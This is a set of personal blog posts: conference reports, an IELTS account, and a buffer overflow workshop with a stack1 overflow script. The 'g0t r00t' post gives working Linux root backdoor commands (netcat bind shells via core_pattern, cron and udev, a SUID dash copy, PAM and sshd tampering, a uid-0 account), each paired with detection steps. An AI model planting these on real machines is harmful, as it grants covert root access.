BufferOverflow Workshop at EasterHegg09

During Easterhegg I held a workshop together with hc. It was about Buffer Overflows, which used to be the most common security vulnerability a couple of years ago.

We gave a talk explaining the basic concepts of processes and how they work on x86 machines. This was heavily packed with information and I really think we couldn’t make everything clear in the first run. But as it was planned as a workshop, we intended to give people stuff they can chew on 😉 Basically, we took stuff from the excellent Phrack article Smashing the Stack for Fun and Profit which is nearly 13 years old by now.

As modern operating systems protect themselves against the consequences of buffer overflows (non-executable stacks, stack canaries, address space randomisation), we prepared a virtual machine with QEmu/KVM so that the exploits will work. It’s an old Debian woody with an SSH daemon and build essentials.

Of course I have changed the image in the last minutes, because I wanted to improve it. And of course something went terribly wrong: The root filesystem was corrupted and fsck deleted important files, leaving the image in a useless state. We had to port my changes back to the old image.

Of course, we wanted to distribute the ~1GB image among our workshop guests. As we expected 50 people to show up and didn’t want to stress the WiFi so much, I intended to use BitTorrent, but it’s not as easy and smart as it could be: we are NATted, so using an external tracker would FAIL. Also, it can’t multicast the packets, which would make perfect sense if many people start to download the torrent in the same network. We ended up having a USB pendrive and a thttpd serving the tarred image. Not very smart or efficient.

After the people ran that image, they couldn’t log in with SSH due to a mysterious heisenbug. I suspect our last-minute changes to be the culprit, but I can’t provide a more technical error description. The SSH daemon worked quite well *in* the image, but as soon as you wanted QEmu to redirect the traffic into the machine, it FAILed: the connection was established, but no data was transferred. Could be a bug in QEmu as well.
The people either worked through the QEmu widget or set up a TUN device to get the network up and running…
That pissed some people off, who then left. We ended up with 20 people trying to hack themselves 🙂

We prepared examples in the image, some of them copied from Gera, e.g.:

/* stack1.c                                     *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
	int cookie;
	char buf[80];

	/* prints where both variables live, so you can compute the distance */
	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);	/* no length check: this is the deliberate overflow */

	if (cookie == 0x41424344)
		printf("you win!\n");
}

The people were supposed to make the program print “you win!”. If you know how a stack works, it’s actually simple: gets() has no idea how big buf is, so whatever you type beyond its 80 bytes runs into cookie, which sits right above it on the stack in the workshop VM. Do you know what input you have to feed in order to win!?
Oh, you don’t want to compile this program with anything other than -O0, because otherwise the compiler rearranges the variables on the stack so that you can’t overwrite the integer… On a current distribution you also need -fno-stack-protector, since the default stack protector not only adds a canary but also moves arrays above the other locals.
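Here is an added example, not part of the workshop image or of gera’s material: a small script that reads the two addresses stack1 prints, computes how far cookie lies above buf, and emits the input that overwrites cookie with 0x41424344 (typed as “DCBA”, because x86 stores the integer little-endian). It assumes a binary ./stack1 built as described above (-O0, no stack protector), that ASLR is off so the addresses are identical between runs, and that cookie does lie above buf. The address line in the script is constructed to stand in for a real first run; the value the VM prints will differ.

```shell
#!/bin/sh
# Added example (not from the workshop image): build the input that makes
# gera's stack1 print "you win!".
#
# Assumptions: ./stack1 was built with -O0 (and -fno-stack-protector on a
# modern gcc), ASLR is off so the addresses stack1 prints are the same on
# every run, and cookie lies above buf on the stack.

# make_payload BUF_ADDR COOKIE_ADDR
# Writes (cookie - buf) filler bytes followed by "DCBA", which is
# 0x41424344 stored little-endian, to stdout. Refuses distances that
# cannot be right for an 80-byte buffer.
make_payload() {
    offset=$(( 0x$2 - 0x$1 ))
    if [ "$offset" -lt 80 ] || [ "$offset" -gt 200 ]; then
        echo "unexpected distance between buf and cookie: $offset" >&2
        return 1
    fi
    i=0
    while [ "$i" -lt "$offset" ]; do
        printf 'A'
        i=$((i + 1))
    done
    printf 'DCBA'
}

# addrs_from_output LINE
# Extracts the two hex addresses from a line such as
# "buf: bffff990 cookie: bffff9e4" and prints them separated by a space.
addrs_from_output() {
    printf '%s\n' "$1" | sed -n 's/^buf: \([0-9a-f]*\) cookie: \([0-9a-f]*\).*/\1 \2/p'
}

# A constructed output line standing in for the first run of
# "echo | ./stack1"; here cookie is 84 bytes above buf (80 bytes of buf
# plus alignment padding). Real values depend on the compiler.
SAMPLE_LINE='buf: bffff990 cookie: bffff9e4'

set -- $(addrs_from_output "$SAMPLE_LINE")
make_payload "$1" "$2" | od -c

# Against the real binary, run it twice: once to learn the addresses,
# once with the payload on stdin:
#   set -- $(addrs_from_output "$(echo | ./stack1 | head -n 1)")
#   make_payload "$1" "$2" | ./stack1
```

The range check matters: if the distance comes out below 80, cookie is not above buf and the compiler laid the frame out differently, so a longer input would only clobber the saved frame pointer and return address.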

In the end, I think I am satisfied with the workshop, although things could have worked better. We had pretty smart people who were really curious how stuff works. They have learned a lot and I guess they had fun with that as well 🙂

Taking the IELTS

As I said some time ago, I had to do an IELTS test in order to apply at the DCU. I already have a language test of sorts which I took for the DAAD, but it’s not good enough for the DCU… So I bit the bullet and paid the Euros to take the IELTS.

I decided to go for the IELTS instead of the TOEFL, because I was told that it’s friendlier and even more comfortable to do. The TOEFL seems to be a computer based test, which can be very annoying.

The IELTS was held in a friendly but formal atmosphere. Everything, and I mean everything, had a rule you and the supervisors had to stick to. I wasn’t even allowed to take my keys inside the examination room.  Not to mention my wallet.

The test itself went pretty well, especially the listening and reading parts. I didn’t manage to perform equally well on the writing part. These tests took a couple of hours and I was pretty happy to get some fresh air afterwards. I had three hours of spare time before the speaking test was due to begin. Actually, I was really nervous. I don’t know why, because there was nothing I should be afraid of. I mean, even if I failed pretty hard, I could always redo the test. At least I managed to speak, and the results are not that bad.

So I got a better result than I actually needed 🙂 One step closer to my application at the DCU.

any2ogg/Theora+Vorbis

My university decided to publish some videos using a DivX codec. These videos are part of some software engineering class and serve as a replacement for real customer interaction.

Anyway, I decided to transcode those videos using a free codec, and I boldly announced that I’ll do that without actually knowing how much work that’d be. In fact, I feared kilobytes of arguments to mencoder or ffmpeg. I also didn’t want to use new and awesome stuff like Transmageddon or Arista, because I wanted a really simple solution, like any2wav. I imagined something like any2theora which simply does what I want.

It turns out that ffmpeg2theora exists and it does exactly what I want. It is really simple to use: no command line arguments whatsoever are needed to produce a well working Theora encoded video with Vorbis encoded sound.

Yay!

Gran Canaria Desktop Summit

The GCDS has just finished and I think it was a great and successful conference. It was the first joint aKademy + GUADEC conference and I feel it turned out quite well. We could have had more explicit collaboration or more attention on the “other” talks, but I think the people have to get used to the fact that there are people with different approaches who you can talk to. Let’s hope it’ll be a joint convention next year as well (I always wanted to spend a week or two in Finland…).

The registration process was a bit weird, because the organizers wanted to know private data without even trying to make clear what it is used for. In fact, the only purpose I could see (even in retrospect) is to collect the data. As I’ve stated in a mail buried in this thread, I don’t really like that for several reasons, and I hope that the next organization committee will only collect data that is absolutely necessary.

The first day began with a RMS keynote for me. I expected it to be really bad because for some reason the people say that RMS’ talks are boring, stubborn and repetitive. I’ve never heard a RMS talk before and I couldn’t apply any of these critics to his talk. In fact, I really liked and enjoyed it, although it was not necessarily pleasant to listen to because he disagrees with our decisions: he doesn’t like to see new applications being written in C# because the Software Freedom Law Center doesn’t think that the Community Promise guarantees that Microsoft will not charge patent fees. I am not into that topic but I believe that the SFLC does a good job. And I also trust the SFLC more than I trust Microsoft. So it’s not about patents in general (which should be abolished anyway) but rather about not putting too much weight onto our Desktop so that we can get rid of C# apps easily in case of fire^W ugly patent stuff. And I don’t know what’s not clear about that: as the risk seems to be there and we want to have a free desktop in the future, we have to watch out now to not fall into a Bitkeeper trap.

I also don’t agree with travis or lefty who think the reference to an EMACS virgin is sexist or that mixing different topics (software freedom and religion in this case) is unhealthy. RMS clearly referred to the Christian church and its habits, so if there is anything bad, it is to be searched for in these circles. Also, virtually everyone cheered after RMS’ performance, and I wouldn’t go that far and call the whole audience sexist. Actually, I dislike the idea of (computer) engineers answering sociologists’ questions for the same reason I don’t ask a sociologist in case of computer trouble (I like it when they think, talk and discuss about it though). From an intersectional point of view, I’d ask whether the strong focus on women is actually sexist, because there is clearly more than one domain we have minorities in. Take Blacks, Jews, Disabled or Queers or people with an inside out belly button for example. By constantly reciting that women are a minority, we could actually harden this situation instead of making it disappear. I could actually write a paper about it, as I need one for university anyway to finish my Gender Studies.

The parties were all awesome, thanks to Canonical, Nokia, Igalia and Collabora who really know how to throw a good party. I wonder why Google didn’t show up though.

I also have to thank the GNOME Foundation for sponsoring my trip to Gran Canaria! It’s really good to see that my contributions are valued and that I can improve them by attending various talks and sessions. This year was especially useful because we could attend the KDE people’s sessions. I especially enjoyed being at the KDE bugsquad sessions to share and improve ideas.
Sponsored by GNOME!

Although I took some photos, I won’t upload them to Flickr, but the people seem to tag their photos with “gcds” or “guadec”. I have looked through a couple of them and they all seem to be good. But I couldn’t make it through all of them as there are way too many.

Two major drawbacks were the relocation of the conference and the Internet connectivity during the event: We moved from the rather central Alfredo Kraus Auditorium to the suburban University on the fourth day or so. That was inconvenient because it took ages to get there. The Internet thing is totally unrelated to the organizers, but left a bad taste anyway. The uplink was totally broken with a packet loss with up to 75% in “So6-0-0-0-grtmadno1.red.telefonica-wholesale.net”.

I’m looking forward to next years GUADEC or maybe “TDS”… 🙂

Bugsquadding Talk on GCDS

I just had my talk with Pedro and I think it went quite well.

We talked about how to do QA in GNOME and how to use our tools properly. There were about 30 people listening and discussing with us. It was a great honour to meet the bugsquad heroes like Philip, Akhil and guenther. Thanks to Andre for looking over our slides.

Besides telling about our infrastructure, we briefly discussed alternative ways to access our bug database: there seem to be Deskzilla and Mylyn to work with Bugzilla through the XML-RPC API. I haven’t tried Deskzilla yet (the GNOME key link is broken atm), but Cosimo says it doesn’t work with the GNOME Bugzilla, probably because it’s heavily patched. I wonder when we’ll migrate to Bugzilla 3…
I tried Mylyn but unfortunately it doesn’t work either 🙁 You can query and show the bugs but you can’t update them. It’s a pity, because I think that web interfaces suck in general and our GNOME Bugzilla in particular.

Although the intended target group wasn’t there, we managed to recruit triagers 🙂 Let’s hope they’ll stay with us for a while. You can find the bugsquad-slides.

I followed the KDE Bugsquad BoF and we discussed several things. They seem to have more fundamental problems than we do, especially getting the Bugzilla used by the developers. I collected a couple of ideas: given that you can’t edit bugs right away if you have just created an account, would it be good to automatically grant editing rights once a user has commit permissions on the VCS? What about a bugsquad (micro)blog to keep the community informed and involved? It could be a good idea to have a kind of monthly digest which will be sent around. I also envy the KDE Bugdays, which apparently are a lot of work but also potentially recruit new bug triagers. Maybe one could write a webapp for managing the work involved…

mrmcd0x8 – Call for Participation

The MetaRheinMain ChaosDays are going into a new round *yay*! I probably won’t be able to make it this year, but then I’ve been there often enough already 😉 If you want to submit a talk or a workshop, please use the Pentabarf. One reason to submit something (or simply to go there) is the Pornophonique concert! Highly recommended.

c&p from the official page:

The CCCMZ, C3F2M, CCC Mannheim, oqlt, the IT Stammtisch Darmstadt and CDA invite you to the eighth MetaRheinMain ChaosDays.

The MetaRheinMain Chaosdays 0x8 are an annual congress which this year, under the motto “Zurueck zum Thema” (back to the topic) with the focal points journalism, society and technology, is organised by the c3f2m Frankfurt, CCCmz (Mainz/Wiesbaden), the Hochschulgruppe Chaos Darmstadt, the AK Vorrat and further regional groups in the Rhine-Main-Neckar area. This year the MRMCDs take place from 04.09. to 06.09.2009 at the Technische Universität Darmstadt. Three days of talks, discussions and a hackcenter are on offer.

The talks and workshops address the general public as well as specialised interests. This way the link to academia and to the current public discourse is to be preserved. The following focal points form the backbone of the event:

  • Journalism
  • Society
  • Technology

These include, e.g.: voting machines, surveillance, cryptography, IT security, biometrics, data retention, the BKA law, the electronic health card, the impact of advancing technology on society, chaos culture, project and self-management.

16th DFN CERT Workshop 2009

Again, I had the great pleasure to attend the annual DFN Workshop which takes place in the Conference Center Hamburg (ever thought about, why they haven’t called it “Konferenz Zentrum”?).


It’s more “tieish” than a Chaos Communication Congress but it’s still comfortable being there. Most people have a strong academic background so they were used to jeans and pullovers as well 😉

The first person to speak was Dr. Neil Long from Team Cymru, and he spoke about the underground economy. They claim to research and investigate that area and to make deals with the criminals. He showed IRC logs most of the time, and it was quite funny to see how the people interact with each other. They actually do speak 1337, and even I had a tough time reading their conversation 😉 He explained in great detail how the underground is organized. He claimed that there are specialists for everything, everywhere: programmers, exploit writers, web hosts, credit card stealers, yadda yadda. Everything has its price, and that is paid through various online money transferring systems.

The next guy talked about exploit toolkits for the web. He named various kits, like MPack, IcePack, NeoSploit, FirePack or UniquePack. They basically allow you to create a drive-by download site and deploy a given payload. The programs themselves are split up into two parts: a server part which actually exploits a browser and makes it download and execute a loader program, which in turn downloads the second stage, the real malware to be run on the victim’s machine; and a binary to create that first-stage loader. I spent some time searching for those toolkits and downloaded some of them. That required me to learn some Russian 😉
This first-stage part opens an interesting attack vector against the wannabe hackers: many web exploit toolkits were infected with malware themselves. Because you have to run a strange smelling binary to create your first-stage executable, you might run foreign malware yourself. I actually don’t understand why this loader thing is such a big issue. I assume you could deploy your malware in the first place without having it loaded through a staging program.

The next interesting talk was given by the smart guys from RedTeam Pentesting, which is a pretty interesting company actually. Former students founded that company and they do professional pentesting. I have to admit that I envy them a little. It must be a great job with a lot of interesting stuff to see. Anyway, they talked about JBoss insecurities. It seems that JBoss ships with a development configuration, and people don’t change it to production values but blindly bind their server to the network. It turns out that you can get shell access in nearly a handful of ways, even if a smart administrator has locked some of them down. Also, many corporate or governmental sites are run by a JBoss server and, which is the interesting part, have a weak configuration. They have an interesting statistic which shows that only 8% of the JBoss servers out there are reasonably secure.

How secure is the JBoss Web?

I was actually bored by just one talk. It was about GRID firewalls. While the topic is interesting in general, the guy made me fall asleep :- That’s a pity, because I believe he knew what he was talking about and had valuable information to deliver, especially due to his strong emphasis on practical problems. Maybe he can get his talk accepted next year and improve his presentation skills.

After the first day, we visited the Groeninger Braukeller which was a real blast! They have one of the finest beers I know of. Also the food in there is delicious. It’s a perfect atmosphere to get together and discuss the talks you’ve just listened to. I also took the chance to meet old friends which I haven’t seen for a while.

Probably due to the massive amount of food and beer, I couldn’t sleep well that night and thus was very tired the second day. I’ve listened to the talks but I couldn’t make it to the ModSecurity workshop 🙁 It’s really annoying, because I actually wanted to attend that session! I do use ModSecurity in some projects and I think it’s a good tool. A real-life-relevant workshop would have been great.

So, if you have nothing else to do on 2010-02-09, consider coming to Hamburg and enjoying the 17th DFN Workshop!

g0t r00t? pwning a machine

Imagine you have root access to a machine for, say, 15 minutes. Or better: imagine you have accidentally left your machine unattended for about 900 seconds and once you’re back, you’re wondering what an attacker could have done.

I’ll explain a few simple and quick attacks which have a rather high impact. The main motivation came from the Hacking Contest at the LinuxTag in Berlin. Its rules, in short, are: have your laptop backdoored in 15 minutes by the opponent team while you backdoor theirs, clean your computer in 15 minutes and exploit the opponents’ laptop in the following 15 minutes.

core pattern

core_pattern tells the kernel what to do with a core dump. If the pattern starts with a pipe, the rest of the line is a program which the kernel runs as root, with the dump on its stdin, no matter which user’s process crashed. Ubuntu uses that to launch apport, and you can hijack the feature to have your rootshell executed:

   echo '|/bin/nc.traditional -l -p 31337 -e /bin/sh' | sudo tee /proc/sys/kernel/core_pattern
   gedit & kill -SEGV %%

The second line starts gedit in the background and sends SIGSEGV to that job (%%), so the kernel runs the handler. You see, it’s pretty simple, quick to install and powerful as well: you can now connect to localhost 31337 to have a rootshell, and each further crash spawns another listener (nc.traditional serves one connection and exits). Of course you could launch connect-back shells or any other malicious program instead.

To counter this threat, read the core_pattern file and, if in doubt, put the default back, which is plain “core”:

  echo core | sudo tee /proc/sys/kernel/core_pattern

cronjobs

You know cronjobs, don’t you? But do you know the cronjobs of the “games” or “mysql” user? And have you checked your /etc/cron.*/? You better do 😉 Because installing malicious scripts there is pretty simple:

  for u in root games mysql; do sudo crontab -e -u $u; done

and in each editor that opens, add a line like

  5 * * * * /bin/nc.traditional -l -p 31337 -e /bin/sh

(The jobs of games or mysql don’t run as root, of course, but they survive an admin who only looks at root’s crontab.) You might also want to drop a file with the above-mentioned cron line into /etc/cron.d/, where it needs the user name as an extra field between the time specification and the command, and an executable script into /etc/cron.hourly/, which run-parts executes without any time specification at all.

If you are a smart attacker, you have multiple lines containing the same job, especially one line after 1000 newlines, so that the admin has to scroll for ages to find it…

To counter this, check your cronjobs, and read the files rather than just listing them: sudo ls -l /var/spool/cron/crontabs/ /etc/cron.*/

dash backdoor

If you run a program which has the SUID bit set, you get the rights of the user owning that file. That is useful for ping or passwd, but probably isn’t for a shell. That’s why bash drops the privileges again when it notices that its effective uid differs from its real uid (unless it is started with -p). The “dash”, however, happily keeps them 🙂

  sudo cp /bin/dash /bin/ping4 && sudo chmod u+s /bin/ping4

To find SUID and SGID binaries (the backslashes matter):

  find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \;

You’ll get a rootshell by simply executing ping4; id will show euid=0(root). Note that the listing above only shows names and modes: a SUID copy of dash called ping4 looks as innocent as the real ping, so compare the contents of the SUID files with the shells you have installed.

hide processes (with listening sockets) from ps and lsof

Tools like ps, top and lsof get everything they know from /proc/<pid>/. Bind-mount an empty directory over that directory and the process disappears from their output while it keeps running:

  mkdir /tmp/empty
  /bin/nc.traditional -l -p 31337 -e /bin/sh &
  ps aux | grep $!
  sudo mount --bind /tmp/empty /proc/$!
  ps aux | grep $!

Countermeasure: netstat -tulpe still shows the listening socket, but since netstat maps sockets to processes through /proc/<pid>/fd, it prints “-” instead of a program name for the hidden one, which is a finding in itself. Also check cat /proc/$$/mountinfo for suspicious mounts over /proc/, and note that ls /proc still lists the pid directory (it is only the mount on top that is empty).
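An added example for the countermeasure, not code from the original post: it reads the mount table for anything mounted over a /proc/<pid> directory and, independently, looks for pid directories that exist but lack the stat file every real one has. It assumes a Linux kernel with /proc/self/mountinfo (2.6.26 and later), where the fifth field is the mount point; the mountinfo lines in the script are constructed to look like the result of the mount --bind above, not captured from a real host.

```shell
#!/bin/sh
# Added example (not from the original post): find processes hidden by a
# bind mount over their /proc/<pid> directory, as with the nc above.
# Two independent signals are used: the mount table itself, and the fact
# that a real /proc/<pid> always contains a "stat" file while an empty
# directory mounted on top does not.
#
# Assumption: Linux with /proc/self/mountinfo (2.6.26 and later); its
# fifth field is the mount point.

# hidden_proc_mounts < MOUNTINFO
# Prints every mount point of the form /proc/<pid>. Nothing legitimate
# is ever mounted there.
hidden_proc_mounts() {
    awk '$5 ~ /^\/proc\/[0-9]+$/ { print $5 }'
}

# covered_pids
# Prints pids whose /proc directory exists but has no /proc/<pid>/stat,
# which is what a bind-mounted empty directory looks like. A process
# that exits between the glob and the test is a harmless false positive.
covered_pids() {
    [ -d /proc/self ] || return 0
    for d in /proc/[0-9]*; do
        [ -e "$d/stat" ] || echo "${d#/proc/}"
    done
}

# Constructed mountinfo, as /proc/self/mountinfo would look after
# "mount --bind /tmp/empty /proc/31337"; not captured from a real host.
SAMPLE_MOUNTINFO='19 25 0:18 / /proc rw,nosuid,nodev,noexec - proc proc rw
25 0 8:1 / / rw,relatime - ext3 /dev/sda1 rw,errors=remount-ro
41 19 8:1 /tmp/empty /proc/31337 rw,relatime - ext3 /dev/sda1 rw,errors=remount-ro
42 19 0:21 / /proc/sys/fs/binfmt_misc rw,relatime - binfmt_misc binfmt_misc rw'

echo "mounts over /proc/<pid> in the sample:"
printf '%s\n' "$SAMPLE_MOUNTINFO" | hidden_proc_mounts

echo "on this host (empty output is the good case):"
hidden_proc_mounts < /proc/self/mountinfo 2>/dev/null || true
covered_pids
```

The second check needs no root and survives an attacker who also tampers with the mount table view, because the kernel keeps handing out /proc/<pid> entries for every live process regardless of what is mounted on top.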

udev exploit device

The idea is to plug an exploit device into the machine and have a rootshell: udev runs RUN programs as root whenever a matching device shows up.

I plugged a USB mouse into the laptop, watched dmesg or udevadm monitor to find the device’s path, which can then be used with udevadm info --path:

  udevadm info --attribute-walk --path=/devices/pci0000:00/0000:00:1d.0/usb5/5-1/5-1:1.0/input/input18

That’ll produce udev attributes which can be used to write rules, e.g.

  SUBSYSTEM=="input", RUN+="/bin/nc.traditional -l -p 31337 -e /bin/sh"

which fires for any input device, not just that mouse. Keep in mind that udev expects RUN programs to return quickly and recent versions kill them after a timeout, so a long-lived listener has to detach itself first. You want to hide that in /etc/udev/rules.d or better /lib/udev/rules.d/, between the hundreds of legitimate rules.

To counter this threat, you have no choice besides:

  grep -rn RUN /etc/udev/rules.d/ /lib/udev/rules.d/

which is unfortunately not that easy, because the legitimate rules use RUN+= all over the place and you have to judge each program by what it does.

PAM deauthentify

Most of the time, PAM is the central place for all services to authenticate a user. While configuring PAM is not the most exciting thing I know, you can exploit it without actually knowing anything about the modules or the syntax.

Simply replace pam_deny with pam_permit in /etc/pam.d/common-auth:

  auth   requisite           pam_permit.so

With that, every service that includes common-auth (login, sshd, gdm, sudo, …) accepts any password.

To counter modified PAM rules, there’s nothing you can do besides reading your rules 🙁 If you go down this rabbit hole, bring a flashlight.

A better hack would be to replace the deny module with the permit module! The configuration then stays pristine while the code behind it says yes to everything:

  cd /lib/security; ln -f pam_permit.so pam_deny.so

If it’s hardlinked like above, you can find both files with (run in /lib/security)

  find . -links +1

If it’s copied instead of hardlinked, you have to compare file hashes, e.g. against the package’s md5sums with debsums, or better reinstall libpam-modules.
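Here is one added example, not from the original post, covering two of the checks above: the SUID copy of a shell under another name from the dash section, and pam_deny.so turned into a hard link to, or a plain copy of, pam_permit.so. Both decide by inode and content rather than by name, because the name is whatever the attacker chose. It assumes Linux with coreutils (sha256sum or md5sum, cmp) and a test builtin that understands -ef (dash, bash and ksh all do); the demo tree it builds is constructed in a temporary directory, and nothing touches the real /bin or /lib.

```shell
#!/bin/sh
# Added example (not from the original post) for two checks above:
# SUID/SGID copies of a shell under another name (the dash "ping4"), and
# pam_deny.so turned into a hard link to, or a plain copy of,
# pam_permit.so. Both decide by inode and content, since the file name
# is whatever the attacker chose.
#
# Assumptions: Linux with coreutils (sha256sum or md5sum, cmp) and a test
# builtin that understands -ef (dash, bash and ksh all do). The demo tree
# below is constructed; nothing here touches the real /bin or /lib.

# checksum FILE: content hash, empty if the file cannot be read.
checksum() {
    { sha256sum "$1" || md5sum "$1"; } 2>/dev/null | cut -d' ' -f1
}

# suid_shell_copies ROOT SHELL...
# Lists SUID/SGID regular files under ROOT whose content is byte-for-byte
# identical to one of the named shells, regardless of their name.
suid_shell_copies() {
    root=$1; shift
    known=
    for s in "$@"; do
        known="$known $(checksum "$s"):$s"
    done
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while read -r f; do
        fsum=$(checksum "$f")
        [ -n "$fsum" ] || continue
        for entry in $known; do
            case "$entry" in
                "$fsum":*) echo "$f is a SUID/SGID copy of ${entry#*:}" ;;
            esac
        done
    done
}

# pam_deny_is_permit DIR
# Returns 0 and explains if DIR/pam_deny.so is really pam_permit.so,
# either as the same inode (ln -f) or as identical bytes (cp).
pam_deny_is_permit() {
    deny=$1/pam_deny.so; permit=$1/pam_permit.so
    if [ "$deny" -ef "$permit" ]; then
        echo "$deny is a hard link to $permit (find $1 -links +1 shows both)"
    elif cmp -s "$deny" "$permit"; then
        echo "$deny has the same content as $permit"
    else
        return 1
    fi
}

# build_demo_tree
# Constructs a throwaway tree that mimics both backdoors and prints its
# path: bin/ping4 is a SUID copy of /bin/sh, security/pam_deny.so is a
# hard link to a stand-in pam_permit.so.
build_demo_tree() {
    d=$(mktemp -d "${TMPDIR:-/tmp}/r00t-demo.XXXXXX")
    mkdir "$d/bin" "$d/security"
    cp /bin/sh "$d/bin/ping4" && chmod u+s "$d/bin/ping4"
    cp /bin/sh "$d/bin/plainsh"      # same content, no SUID bit: not reported
    printf 'stand-in for pam_permit.so\n' > "$d/security/pam_permit.so"
    printf 'stand-in for pam_unix.so\n' > "$d/security/pam_unix.so"
    ln -f "$d/security/pam_permit.so" "$d/security/pam_deny.so"
    echo "$d"
}

DEMO=$(build_demo_tree)
suid_shell_copies "$DEMO" /bin/sh
pam_deny_is_permit "$DEMO/security" || echo "pam_deny.so looks genuine"
rm -rf "$DEMO"

# On a live system: suid_shell_copies / /bin/sh /bin/dash /bin/bash and
# pam_deny_is_permit /lib/security (or wherever your PAM modules live).
```

Comparing against the shells you actually have installed is the point: a renamed dash matches its original byte for byte, while a legitimately SUID binary such as ping never will.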

rewrite sshd config

Public key authentication is very convenient, because you don’t have to remember passwords. Also, you can hijack accounts easily if you add your public key to the file with the authorized keys 😉 Assuming a key pair in ~/.ssh/:

  cat ~/.ssh/id_rsa.pub | sudo tee /root/.wgetrc
  cp /etc/ssh/sshd_config /tmp/
  (put AuthorizedKeysFile %h/.wgetrc into /etc/ssh/sshd_config)
  (put Banner /etc/issue.net into /etc/ssh/sshd_config)
  sudo /etc/init.d/ssh reload
  sudo mv /tmp/sshd_config /etc/ssh/
  cat ~/.ssh/id_rsa | sudo tee /etc/issue.net

This probably needs some explanation. We first copy the public key into an innocent looking file, then save the original SSHd configuration before we edit it and put those configuration strings in it. By reloading the SSHd it’ll recognize the new configuration, and we then mv the original config back (cp -p keeps its old modification time, which a plain cp does not)! That way, the admin doesn’t see anything suspicious, but the SSHd will keep running with your configuration until the next reload or restart, so a reboot or a package upgrade undoes the trick *yay*. In order to use the stored private key from elsewhere, we’ll blow it out to the world by putting it into the SSHd banner 😉 Be aware that the banner is shown to every client before authentication, the admin’s own ssh included, so this is the noisy part.

To counter this, either patch your sshd so that it reloads immediately once the configuration file has been changed, using inotify (udev does that for its rules), or review your SSHd config and reload it even if you haven’t changed anything! Note that sshd -T only parses the file on disk, so it won’t reveal what the running daemon actually uses.

New Users with UID 0

For some reason, it is not important that a user is named “root”, but that its uid is 0. So if you create a user with the uid 0, you’ll have root privileges 🙂 Multiple users with the same uid but different names are perfectly legal as far as the system is concerned. So, combining this with the 1000-scrolllines trick mentioned above, you have to do something like this:

  echo 'hackr:x:0:0:hackr,,,:/home/hackr:/bin/bash' | sudo tee -a /etc/passwd
  printf '%s\n%s\n' hackr hackr | sudo passwd hackr

add 1000 lines to the passwd file and do the things above again.

To counter, grep ':0:' /etc/passwd, keeping in mind that this also matches gid 0 and the root line itself; anything else with a 0 in the third field has no business being there.
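The countermeasures for the file-based tricks above (the piped core_pattern, the cronjob buried under blank lines, the udev RUN rule, pam_permit in common-auth and the extra uid-0 account) all boil down to reading a text file carefully, so here they are as one added audit script, not code from the original post. Every check takes the file or directory to inspect as an argument, so it also works on a copied /etc or a mounted image; the sample files it writes are constructed to mirror the commands in the post and were not captured from a real machine. It assumes POSIX sh and awk plus a grep that understands -r.

```shell
#!/bin/sh
# Added example (not part of the original post): one audit script for the
# file-based backdoors above: a piped core_pattern, crontab entries buried
# under blank lines, udev RUN rules, pam_permit in common-auth, and extra
# uid-0 accounts. Every check takes the file or directory as an argument,
# so it also works on a copied /etc or a mounted image.
#
# Assumptions: POSIX sh and awk, grep -r. The sample files are
# constructed here to mirror the commands in the post, not captured from
# a real machine.

# core_pattern_check FILE
# Returns 1 and names the program if core dumps are piped to one.
core_pattern_check() {
    pat=$(cat "$1")
    case "$pat" in
        '|'*) echo "core dumps are piped to: ${pat#|}"; return 1 ;;
        *)    echo "core pattern: $pat" ;;
    esac
}

# crontab_jobs FILE
# Prints every non-blank, non-comment line with its line number, so a job
# sitting at line 1002 stands out even though the screen shows only blanks.
crontab_jobs() {
    awk 'NF && $1 !~ /^#/ { print NR ": " $0 }' "$1"
}

# udev_run_rules DIR...
# Lists every rule that runs a program when a device appears.
udev_run_rules() {
    grep -rn 'RUN+=' "$@" || true
}

# pam_permit_in_auth FILE
# Prints auth lines that use pam_permit.so and warns if pam_deny.so has
# vanished from the file altogether.
pam_permit_in_auth() {
    awk '$1 == "auth" && /pam_permit\.so/ { print FILENAME ":" NR ": " $0 }' "$1"
    grep -q 'pam_deny\.so' "$1" || echo "$1: no pam_deny.so line left"
}

# uid0_accounts FILE
# Prints every account whose uid is 0 but whose name is not root.
# Matching the third field is exact, unlike grep ':0:' which also hits gid 0.
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# build_samples
# Writes constructed copies of the files the attacks above modify into a
# temporary directory and prints its path.
build_samples() {
    d=$(mktemp -d "${TMPDIR:-/tmp}/audit-demo.XXXXXX")
    printf '|/bin/nc.traditional -l -p 31337 -e /bin/sh\n' > "$d/core_pattern"
    {
        echo '0 3 * * * /usr/local/bin/backup'
        i=0; while [ "$i" -lt 1000 ]; do echo; i=$((i + 1)); done
        echo '5 * * * * /bin/nc.traditional -l -p 31337 -e /bin/sh'
    } > "$d/crontab"
    mkdir "$d/rules.d"
    echo 'SUBSYSTEM=="input", ENV{ID_INPUT}="1"' > "$d/rules.d/60-input.rules"
    echo 'SUBSYSTEM=="input", RUN+="/bin/nc.traditional -l -p 31337 -e /bin/sh"' \
        > "$d/rules.d/99-local.rules"
    printf '%s\n' \
        'auth    [success=1 default=ignore]  pam_unix.so nullok_secure' \
        'auth    requisite                   pam_permit.so' \
        'auth    required                    pam_permit.so' > "$d/common-auth"
    printf '%s\n' \
        'root:x:0:0:root:/root:/bin/bash' \
        'games:x:5:60:games:/usr/games:/bin/sh' \
        'hackr:x:0:0:hackr,,,:/home/hackr:/bin/bash' > "$d/passwd"
    echo "$d"
}

SAMPLES=$(build_samples)
core_pattern_check "$SAMPLES/core_pattern" || true
crontab_jobs "$SAMPLES/crontab"
udev_run_rules "$SAMPLES/rules.d"
pam_permit_in_auth "$SAMPLES/common-auth"
uid0_accounts "$SAMPLES/passwd"
rm -rf "$SAMPLES"

# Live use: core_pattern_check /proc/sys/kernel/core_pattern,
# crontab_jobs /var/spool/cron/crontabs/root (and /etc/cron.d/*),
# udev_run_rules /etc/udev/rules.d /lib/udev/rules.d,
# pam_permit_in_auth /etc/pam.d/common-auth, uid0_accounts /etc/passwd.
```

The line numbers in the crontab output are the whole point of that check: “1002: 5 * * * * …” tells you immediately that something was hidden below a thousand blank lines, which scrolling through the editor never would.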

Vino

GNOME ships a VNC server which can be activated with vino-preferences. Or for the lazy people:

  gconftool-2 --set /desktop/gnome/remote_access/enabled --type bool true
